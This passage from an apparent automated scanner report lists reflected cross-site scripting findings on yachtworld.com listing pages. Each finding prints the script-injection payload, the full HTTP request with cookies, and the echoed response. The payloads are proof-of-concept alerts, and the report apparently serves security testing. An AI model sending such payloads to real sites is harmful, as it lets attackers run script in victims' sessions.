+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-Riverb36c4"><script>alert(1)</script>0acf81a8360/NJ/United-States&boat_id=1930392">
...[SNIP]...

3.90. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17efc"><script>alert(1)</script>29999bc62e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ17efc"><script>alert(1)</script>29999bc62e/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:25 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:25 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ17efc"><script>alert(1)</script>29999bc62e/United-States&boat_id=1930392">
...[SNIP]...

3.91. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 6 (the trailing United-States segment of the listing path) is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db200"><script>alert(1)</script>b62163eb756 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response, inside the back= query-string parameter of the photoGallery.jsp link's href attribute: the double quote in the payload closes the attribute value, and the <script> element that follows is parsed as markup rather than as part of the URL.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the injection point is a path segment, the payload travels in an ordinary GET link: a victim who follows a crafted URL to this listing executes the script in the origin of www.yachtworld.com, with access to that site's cookies and DOM.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-Statesdb200"><script>alert(1)</script>b62163eb756 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:00 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:00 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=1930392&boat_id=1930392&back=/core/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-Statesdb200"><script>alert(1)</script>b62163eb756&boat_id=1930392">
...[SNIP]...

3.92. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848cf"><script>alert(1)</script>c7c6ac147ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response: the application passes the incoming query string through into the photoGallery.jsp link's href attribute (the payload appears between currency=USD& and &units=Feet), so no known parameter needs to be targeted; any unrecognised parameter name is reflected.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Since the sink accepts any parameter name, input validation applied only to the application's known parameters does not cover this vector; the link builder itself must encode (or allow-list) what it emits.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States?848cf"><script>alert(1)</script>c7c6ac147ce=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:03 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
